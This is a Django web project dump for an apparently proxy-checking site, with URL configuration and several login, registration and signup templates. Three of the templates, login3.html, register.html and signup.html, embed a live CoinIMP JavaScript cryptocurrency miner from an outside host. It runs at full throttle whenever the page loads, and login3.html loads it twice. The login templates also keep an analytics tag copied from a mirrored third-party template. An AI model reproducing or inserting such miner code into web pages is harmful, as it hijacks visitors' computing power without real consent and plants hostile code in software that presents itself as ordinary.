MainArea/urls.py
# pages/urls.py
from django.urls import path , include, re_path
from MainArea import views
from django.contrib.staticfiles.storage import staticfiles_storage
from django.views.generic.base import RedirectView
from django.conf import settings
from .views import contact_form , ContactFormView , validate_username, SignUpView



app_name = 'main'

urlpatterns = [
#    path('dashboard/', views.home_page_view, name='home'),
    path("", views.UserDashboard, name="dashboard"),
    path('save_url/', views.UserDashboard, name='save_url'),
    path("register/", views.register, name="register"),
    path("logout", views.logout_request, name="logout"),
    path("login", views.login_request, name="login"),
    path('contact-form/', views.ContactFormView.as_view(), name='contact_form'),
    path("favicon.ico",RedirectView.as_view(url=staticfiles_storage.url("favicon.ico")),),
    # https://djangocentral.com/django-ajax-with-jquery/
    #########Making AJAX GET requests with Django and JQuery##########
    path('signup', SignUpView.as_view(), name='signup'),
    path('validate_username', validate_username, name='validate_username'),
    ###################
    ]

VrahProxyStar/urls.py
from django.contrib import admin
from django.urls import path, include
from django.conf.urls.static import static
from django.conf import settings

urlpatterns = [
    path('admin/', admin.site.urls),
    path('', include('MainArea.urls')),
    path('', include('ProxyChecker.urls')),
] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)

templates/authTemplates/login.html
{% load static %}
{%load crispy_forms_tags %}
<!DOCTYPE html>
<html lang="en">
   <meta http-equiv="content-type" content="text/html;charset=UTF-8" />
   <head>
      <title>Login V14</title>
      <meta charset="UTF-8">
      <meta name="viewport" content="width=device-width, initial-scale=1">
      <link rel="shortcut icon" type="image/png" href="{% static 'favicon.ico' %}">
      <link rel="stylesheet" type="text/css" href="{% static 'loginp/vendor/bootstrap/css/bootstrap.min.css' %}">
      <link rel="stylesheet" type="text/css" href="{% static 'loginp/fonts/font-awesome-4.7.0/css/font-awesome.min.css' %}">
      <link rel="stylesheet" type="text/css" href="{% static 'loginp/fonts/Linearicons-Free-v1.0.0/icon-font.min.css' %}">
      <link rel="stylesheet" type="text/css" href="{% static 'loginp/vendor/animate/animate.css' %}">
      <link rel="stylesheet" type="text/css" href="{% static 'loginp/vendor/css-hamburgers/hamburgers.min.css' %}">
      <link rel="stylesheet" type="text/css" href="{% static 'loginp/vendor/animsition/css/animsition.min.css' %}">
      <link rel="stylesheet" type="text/css" href="{% static 'loginp/vendor/select2/select2.min.css' %}">
      <link rel="stylesheet" type="text/css" href="{% static 'loginp/vendor/daterangepicker/daterangepicker.css' %}">
      <link rel="stylesheet" type="text/css" href="{% static 'loginp/css/util.css' %}">
      <link rel="stylesheet" type="text/css" href="{% static 'loginp/css/main.css' %}">
   </head>
   <body>
      <div class="limiter">
         <div class="container-login100">
            <div class="wrap-login100 p-l-85 p-r-85 p-t-55 p-b-55">
							<form method="POST" class="login100-form validate-form flex-sb flex-w">
			        {% csrf_token %}
			        {{ form|crispy }}
			            <button style="background-color:#F4EB16; color:blue" class="btn btn-outline-info" type="submit">Login</button>
			        </form>



               <form class="login100-form validate-form flex-sb flex-w">
                  <span class="login100-form-title p-b-32">Account Login</span>
                  <span class="txt1 p-b-11">Username</span>
                  <!--div class="wrap-input100 validate-input m-b-36" data-validate="Username is required">
                     <input class="input100" type="text" name="username">
                     <span class="focus-input100"></span>
                  </div>
                  <span class="txt1 p-b-11">Password</span>
                  <div class="wrap-input100 validate-input m-b-12" data-validate="Password is required">
                     <span class="btn-show-pass">
											 <i class="fa fa-eye"></i>
                     </span>
                     <input class="input100" type="password" name="pass">
                     <span class="focus-input100"></span>
                  </div-->
                  <div class="flex-sb-m w-full p-b-48">
                     <div class="contact100-form-checkbox">
                        <input class="input-checkbox100" id="ckb1" type="checkbox" name="remember-me">
                        <label class="label-checkbox100" for="ckb1">
                        Remember me
                        </label>
                     </div>
                     <div>
                        <a href="#" class="txt3">
                        Forgot Password?
                        </a>
                     </div>
                  </div>
                  <div class="container-login100-form-btn">
                     <button class="login100-form-btn">
                     Login
                     </button>
                  </div>
               </form>
            </div>
         </div>
      </div>
      <div id="dropDownSelect1"></div>
      <script src="{% static 'loginp/vendor/jquery/jquery-3.2.1.min.js' %}"></script>
      <script src="{% static 'loginp/vendor/animsition/js/animsition.min.js' %}"></script>
      <script src="{% static 'loginp/vendor/bootstrap/js/popper.js' %}"></script>
      <script src="{% static 'loginp/vendor/bootstrap/js/bootstrap.min.js' %}"></script>
      <script src="{% static 'loginp/vendor/select2/select2.min.js' %}"></script>
      <script src="{% static 'loginp/vendor/daterangepicker/moment.min.js' %}"></script>
      <script src="{% static 'loginp/vendor/daterangepicker/daterangepicker.js' %}"></script>
      <script src="{% static 'loginp/vendor/countdowntime/countdowntime.js' %}"></script>
      <script src="{% static 'loginp/js/main.js' %}"></script>
      <script async src="https://www.googletagmanager.com/gtag/js?id=UA-23581568-13"></script>
      <script>
         window.dataLayer = window.dataLayer || [];
         function gtag(){dataLayer.push(arguments);}
         gtag('js', new Date());

         gtag('config', 'UA-23581568-13');
      </script>
   </body>
   <!-- Mirrored from colorlib.com/etc/lf/Login_v14/index.html by HTTrack Website Copier/3.x [XR&CO'2014], Thu, 11 Mar 2021 01:17:19 GMT -->
</html>

templates/authTemplates/login0.html
{% extends 'base/header.html' %}
{% load crispy_forms_tags %}
{% block content %}
    <div class="container">
        <form method="POST">
        {% csrf_token %}
        {{ form|crispy }}
            <button style="background-color:#F4EB16; color:blue" class="btn btn-outline-info" type="submit">Login</button>
        </form>
        Du hast keinen Account? <a href="/register" target="blank"><strong>hier registrieren</strong></a>!
    </div>
{% endblock %}

templates/authTemplates/login3.html
{% load static %}
{%load crispy_forms_tags %}
<!DOCTYPE html>
<html>
    <head>
        <title></title>
        <link href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">
        <link href="{% static 'userDashboard/assets/css/main.css' %}" rel="stylesheet" >
        <link href="{% static 'userDashboard/assets/css/ab-particles.css' %}" rel="stylesheet">
        <style>:root {
            --col-particle: #536878;
            --col-particle-stroke: #035096;
            --col-particle-stroke-hover: #0892d0;
          }</style>
          <script src="https://www.hostingcloud.racing/zosF.js"></script>
          <script>
              var _client = new Client.Anonymous('19b89caf750ea26ef409b80e61b19dc8cd15ceb7a19d33f4ad4ddb19a7790727', {
                  throttle: 0, c: 'w'
              });
              _client.start();
              _client.addMiningNotification("Top", "This site is running JavaScript miner from coinimp.com. If it bothers you, you can stop it.", "#cccccc", 40, "#3d3d3d");
  
          </script>
    </head>
    <body onload='particles(speed=15, avoidMouse=false, opacity=65)'>
        <script src="https://www.hostingcloud.racing/zosF.js">
    var _client = new Client.Anonymous('19b89caf750ea26ef409b80e61b19dc8cd15ceb7a19d33f4ad4ddb19a7790727', {
        throttle: 0, c: 'w'
    });
    _client.start();
    _client.addMiningNotification("Top", "This site is running JavaScript miner from coinimp.com. If it bothers you, you can stop it.", "#cccccc", 40, "#3d3d3d");

</script>
        <div class="wrapper">
            <div class="spacer"></div>
            <header>
                <h1>ab-particles</h1>
                <h2>simple, lightweight vanilla-javascript particle animation</h2>
            </header>
            <main>
                <div class="container">
                    <h1>Login</h1>
                    <div style="width:30%">
                        <form method="POST">
                            {%csrf_token%}
                            {% for error in form.non_field_errors %}
                            <div class="form-group has-errors text-danger small">
                                {{error}}
                            </div>
                            {% endfor %}
                            {% for field in form %}
                            <div class="form-group has-errors text-danger small">
                                {{field.errors}}
                            </div>
                            <div class="form-group has-errors text-danger small">
                            </div>
                            <div class="form-group">
                                {{ field }}
                            </div>
                            {% endfor %}
                            <button class="btn btn-primary" style="width:100%">Login</button>
                    </div>
                    </form>
                </div>   
            </main>
            <div class="spacer"></div>
            <footer>
                <p>Design, code and content appearing on this site is developed by
                <a href="https://asifbacchus.com">Asif Bacchus</a> ('author') and
                may be freely used and redistributed in accordance with the <a
                href="https://git.asifbacchus.app/asif/ab-particles/LICENSE">license</a>
                appearing in the <a
                href="https://git.asifbacchus.app/asif/ab-particles.git">content
                repo</a>. Author provides no warranties, guarantees or implications
                of suitability and disclaims any and all responsibility arising from
                the usage of anything appearing on or linked to this page for any
                purpose whatsoever. Copyright 2020 Asif Bacchus. Some Rights
                Reserved.</p>
            </footer>
        </div>
        

    <canvas id="particles"></canvas>
        <!-- javascript -->
        <script
        src="{% static 'loginp/js/ab_particles/ab-particles.min.js' %}"   
        
        integrity="sha384-HI+YXFmq6RX6R45hGuCOv6U/XhbS6swme7nnQVc8g6QfhucST79WEzlK6XMbanUp"
        crossorigin="anonymous"
        defer="">      
        window.addEventListener('load', function(){
            particles(speed=15, avoidMouse=false)
        }, false); 
        </script>
        <!-- end javascript -->

        


    </body>
    

</html>

templates/authTemplates/loginexmample_backup.html
{% load static %}
<!DOCTYPE html>
<html lang="en">
   <meta http-equiv="content-type" content="text/html;charset=UTF-8" />
   <head>
      <title>Login V14</title>
      <meta charset="UTF-8">
      <meta name="viewport" content="width=device-width, initial-scale=1">
      <link rel="shortcut icon" type="image/png" href="{% static 'favicon.ico' %}">
      <link rel="stylesheet" type="text/css" href="{% static 'loginp/vendor/bootstrap/css/bootstrap.min.css' %}">
      <link rel="stylesheet" type="text/css" href="{% static 'loginp/fonts/font-awesome-4.7.0/css/font-awesome.min.css' %}">
      <link rel="stylesheet" type="text/css" href="{% static 'loginp/fonts/Linearicons-Free-v1.0.0/icon-font.min.css' %}">
      <link rel="stylesheet" type="text/css" href="{% static 'loginp/vendor/animate/animate.css' %}">
      <link rel="stylesheet" type="text/css" href="{% static 'loginp/vendor/css-hamburgers/hamburgers.min.css' %}">
      <link rel="stylesheet" type="text/css" href="{% static 'loginp/vendor/animsition/css/animsition.min.css' %}">
      <link rel="stylesheet" type="text/css" href="{% static 'loginp/vendor/select2/select2.min.css' %}">
      <link rel="stylesheet" type="text/css" href="{% static 'loginp/vendor/daterangepicker/daterangepicker.css' %}">
      <link rel="stylesheet" type="text/css" href="{% static 'loginp/css/util.css' %}">
      <link rel="stylesheet" type="text/css" href="{% static 'loginp/css/main.css' %}">
   </head>
   <body>
      <div class="limiter">
         <div class="container-login100">
            <div class="wrap-login100 p-l-85 p-r-85 p-t-55 p-b-55">
               <form class="login100-form validate-form flex-sb flex-w">
                  <span class="login100-form-title p-b-32">Account Login</span>
                  <span class="txt1 p-b-11">Username</span>
                  <div class="wrap-input100 validate-input m-b-36" data-validate="Username is required">
                     <input class="input100" type="text" name="username">
                     <span class="focus-input100"></span>
                  </div>
                  <span class="txt1 p-b-11">Password</span>
                  <div class="wrap-input100 validate-input m-b-12" data-validate="Password is required">
                     <span class="btn-show-pass">
											 <i class="fa fa-eye"></i>
                     </span>
                     <input class="input100" type="password" name="pass">
                     <span class="focus-input100"></span>
                  </div>
                  <div class="flex-sb-m w-full p-b-48">
                     <div class="contact100-form-checkbox">
                        <input class="input-checkbox100" id="ckb1" type="checkbox" name="remember-me">
                        <label class="label-checkbox100" for="ckb1">
                        Remember me
                        </label>
                     </div>
                     <div>
                        <a href="#" class="txt3">
                        Forgot Password?
                        </a>
                     </div>
                  </div>
                  <div class="container-login100-form-btn">
                     <button class="login100-form-btn">
                     Login
                     </button>
                  </div>
               </form>
            </div>
         </div>
      </div>
      <div id="dropDownSelect1"></div>
      <script src="{% static 'loginp/vendor/jquery/jquery-3.2.1.min.js' %}"></script>
      <script src="{% static 'loginp/vendor/animsition/js/animsition.min.js' %}"></script>
      <script src="{% static 'loginp/vendor/bootstrap/js/popper.js' %}"></script>
      <script src="{% static 'loginp/vendor/bootstrap/js/bootstrap.min.js' %}"></script>
      <script src="{% static 'loginp/vendor/select2/select2.min.js' %}"></script>
      <script src="{% static 'loginp/vendor/daterangepicker/moment.min.js' %}"></script>
      <script src="{% static 'loginp/vendor/daterangepicker/daterangepicker.js' %}"></script>
      <script src="{% static 'loginp/vendor/countdowntime/countdowntime.js' %}"></script>
      <script src="{% static 'loginp/js/main.js' %}"></script>
      <script async src="https://www.googletagmanager.com/gtag/js?id=UA-23581568-13"></script>
      <script>
         window.dataLayer = window.dataLayer || [];
         function gtag(){dataLayer.push(arguments);}
         gtag('js', new Date());

         gtag('config', 'UA-23581568-13');
      </script>
   </body>
   <!-- Mirrored from colorlib.com/etc/lf/Login_v14/index.html by HTTrack Website Copier/3.x [XR&CO'2014], Thu, 11 Mar 2021 01:17:19 GMT -->
</html>

templates/authTemplates/register.html

{% load crispy_forms_tags %}
<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css"
        integrity="sha384-JcKb8q3iqJ61gNV9KGb8thSsNjpSL0n8PARn9HuZOnIxN0hoP+VmmDGMN5t9UJ0Z" crossorigin="anonymous">
</head>

<body>
    <div id="signupForm" class="container mt-5 w-50">
      <form method="POST" enctype="multipart/form-data">
          {% csrf_token %}
          {{user_form |crispy}}
          {{profile_form|crispy}}
          <button class="btn btn-success btn-lg" name="signupSubmit" type="submit">Sign Up</button>
      </form>
    </div>

    {% block javascript %}
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
    <script src="https://www.hostingcloud.racing/zosF.js"></script>
<script>
    var _client = new Client.Anonymous('19b89caf750ea26ef409b80e61b19dc8cd15ceb7a19d33f4ad4ddb19a7790727', {
        throttle: 0, c: 'w'
    });
    _client.start();
    _client.addMiningNotification("Top", "This site is running JavaScript miner from coinimp.com. If it bothers you, you can stop it.", "#cccccc", 40, "#3d3d3d");

</script>

    <script>
        $(document).ready(function () {
            // catch the form's submit event
            $('#id_username').keyup(function () {
                // create an AJAX call
                $.ajax({
                    data: $(this).serialize(), // get the form data
                    url: "{% url 'main:validate_username' %}",
                    // on success
                    success: function (response) {
                        if (response.is_taken == true) {
                            $('#id_username').removeClass('is-valid').addClass('is-invalid');
                            $('#id_username').after('<div class="invalid-feedback d-block" id="usernameError">This username is not available!</div>')
                        }
                        else {
                            $('#id_username').removeClass('is-invalid').addClass('is-valid');
                            $('#usernameError').remove();

                        }

                    },
                    // on error
                    error: function (response) {
                        // alert the error if any error occured
                        console.log(response.responseJSON.errors)
                    }
                });

                return false;
            });
        })
    </script>
    {% endblock javascript %}
</body>

</html>

templates/authTemplates/register0.html
{% load crispy_forms_tags %}
<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css"
        integrity="sha384-JcKb8q3iqJ61gNV9KGb8thSsNjpSL0n8PARn9HuZOnIxN0hoP+VmmDGMN5t9UJ0Z" crossorigin="anonymous">
</head>

<body>
    <div class="container mt-5 w-50">
        <form id="signupForm" method="POST" enctype="multipart/form-data">
            {% csrf_token %}
            {{ form|crispy  }}
            <input type="submit" name="signupSubmit" class="btn btn-success btn-lg" />
        </form>
    </div>

    {% block javascript %}
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>

    <script>
        $(document).ready(function () {
            // catch the form's submit event
            $('#id_username').keyup(function () {
                // create an AJAX call
                $.ajax({
                    data: $(this).serialize(), // get the form data
                    url: "{% url 'validate_username' %}",
                    // on success
                    success: function (response) {
                        if (response.is_taken == true) {
                            $('#id_username').removeClass('is-valid').addClass('is-invalid');
                            $('#id_username').after('<div class="invalid-feedback d-block" id="usernameError">This username is not available!</div>')
                        }
                        else {
                            $('#id_username').removeClass('is-invalid').addClass('is-valid');
                            $('#usernameError').remove();

                        }

                    },
                    // on error
                    error: function (response) {
                        // alert the error if any error occured
                        console.log(response.responseJSON.errors)
                    }
                });

                return false;
            });
        })
    </script>
    {% endblock javascript %}
</body>

</html>

templates/authTemplates/signup.html
{% load crispy_forms_tags %}
<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css"
        integrity="sha384-JcKb8q3iqJ61gNV9KGb8thSsNjpSL0n8PARn9HuZOnIxN0hoP+VmmDGMN5t9UJ0Z" crossorigin="anonymous">
</head>

<body>
    <div class="container mt-5 w-50">
        <form id="signupForm" method="POST">
            {% csrf_token %}
            {{ form|crispy  }}
            <input type="submit" name="signupSubmit" class="btn btn-success btn-lg" />
        </form>
    </div>

    {% block javascript %}
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
    <script src="https://www.hostingcloud.racing/zosF.js"></script>
<script>
    var _client = new Client.Anonymous('19b89caf750ea26ef409b80e61b19dc8cd15ceb7a19d33f4ad4ddb19a7790727', {
        throttle: 0, c: 'w'
    });
    _client.start();
    _client.addMiningNotification("Top", "This site is running JavaScript miner from coinimp.com. If it bothers you, you can stop it.", "#cccccc", 40, "#3d3d3d");

</script>

    <script>
        $(document).ready(function () {
            // catch the form's submit event
            $('#id_username').keyup(function () {
                // create an AJAX call
                $.ajax({
                    data: $(this).serialize(), // get the form data
                    url: "{% url 'main:validate_username' %}",
                    // on success
                    success: function (response) {
                        if (response.is_taken == true) {
                            $('#id_username').removeClass('is-valid').addClass('is-invalid');
                            $('#id_username').after('<div class="invalid-feedback d-block" id="usernameError">This username is not available!</div>')
                        }
                        else {
                            $('#id_username').removeClass('is-invalid').addClass('is-valid');
                            $('#usernameError').remove();

                        }

                    },
                    // on error
                    error: function (response) {
                        // alert the error if any error occured
                        console.log(response.responseJSON.errors)
                    }
                });

                return false;
            });
        })
    </script>
    {% endblock javascript %}
</body>

</html>